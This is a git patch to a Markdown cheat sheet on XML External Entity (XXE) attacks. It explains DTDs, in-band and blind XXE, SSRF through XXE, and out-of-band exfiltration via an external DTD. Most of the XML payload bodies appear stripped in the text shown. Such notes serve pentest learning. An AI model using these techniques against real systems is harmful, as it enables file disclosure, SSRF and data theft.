From 83d452c487496a4ad8f69e7f96822ad51cd173b4 Mon Sep 17 00:00:00 2001 From: gurkenhabicht Date: Tue, 4 Jun 2024 21:03:50 +0200 Subject: [PATCH] added information --- Exploits/Web/XXE.md | 82 +++++++++++++++++++++++++++++++++++++++------ 1 file changed, 72 insertions(+), 10 deletions(-) diff --git a/Exploits/Web/XXE.md b/Exploits/Web/XXE.md index 7f1fff8..31bccf6 100644 --- a/Exploits/Web/XXE.md +++ b/Exploits/Web/XXE.md @@ -1,20 +1,39 @@ # XML External Entity (XXE) -An XML External Entity (XXE) attack is a vulnerability that abuses features of XML parsers/data. It often allows an attacker to interact with any backend or external systems that the application itself can access and can allow the attacker to read the file on that system. They can also cause Denial of Service (DoS) attack or could use XXE to perform Server-Side Request Forgery (SSRF) inducing the web application to make requests to other applications. XXE may even enable port scanning and lead to remote code execution. +An XML External Entity (XXE) attack is a vulnerability that abuses features of +XML parsers/data. It often allows an attacker to interact with any backend or +external systems that the application itself can access and can allow the +attacker to read the file on that system. They can also cause Denial of Service +(DoS) attack or could use XXE to perform Server-Side Request Forgery (SSRF) +inducing the web application to make requests to other applications. XXE may +even enable port scanning and lead to remote code execution. There are two types of XXE attacks: in-band and out-of-band (OOB-XXE). -1. An in-band XXE attack is the one in which the attacker can receive an immediate response to the XXE payload. -2. out-of-band XXE attacks (also called blind XXE), there is no immediate response from the web application and attacker has to reflect the output of their XXE payload to some other file or their own server. +1. An in-band XXE attack is the one in which the attacker can receive an + immediate response to the XXE payload. +2. out-of-band XXE attacks (also called blind XXE), there is no immediate + response from the web application and attacker has to reflect the output of + their XXE payload to some other file or their own server. ## Document Type Definition (DTD) A DTD defines the structure and the legal elements and attributes of an XML document. +DTD are vulnerable depending on the parser used for parsing the enitities, e.g. +DOM parser. -* Example file content of `note.dtd` -``` - ]> +Example file content of `note.dtd` is the following. + +```xml + + + + + + ]> ``` + * !DOCTYPE note - Defines a root element of the document named note * !ELEMENT note - Defines that the note element must contain the elements: "to, from, heading, body" * !ELEMENT to - Defines the `to` element to be of type "#PCDATA" @@ -22,10 +41,10 @@ A DTD defines the structure and the legal elements and attributes of an XML docu * !ELEMENT heading - Defines the `heading` element to be of type "#PCDATA" * !ELEMENT body - Defines the `body` element to be of type "#PCDATA" - NOTE: #PCDATA means parseable character data. * Resulting XML doc follows + ```xml @@ -39,7 +58,8 @@ A DTD defines the structure and the legal elements and attributes of an XML docu ## Replacing XML content -* Name in the example +Replace the name in the following example. + ```xml ]> @@ -47,7 +67,9 @@ A DTD defines the structure and the legal elements and attributes of an XML docu &name; ``` -* System call inside entity + +System call inside entity in the following example. + ```xml ]> @@ -58,13 +80,15 @@ A DTD defines the structure and the legal elements and attributes of an XML docu 12345 ``` + ```xml ]> &read; ``` -* PHP expect using syscalls +PHP expect using syscalls looks like the following example. + ```xml @@ -75,6 +99,44 @@ A DTD defines the structure and the legal elements and attributes of an XML docu ``` +An example of SSRF using XXE follows. + +```xml + + + + ]> + + &xxe; + 12345 + +``` + +### Upload External DTD File + +An external entity which is a reference to a DTD in another file can be +set as well to upload a payload indirectly. + +```xml + +]> +&exfil; +``` + +The payload which would be resource `external.dtd` may look like the following example. + +```xml + +"> +%oobxxe; +``` + +## Notes + +Use URL/entity encoding for data that should be interpreted as a string literal +completely, e.g. `&` or `&`. ## Tools + * [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection#classic-xxe)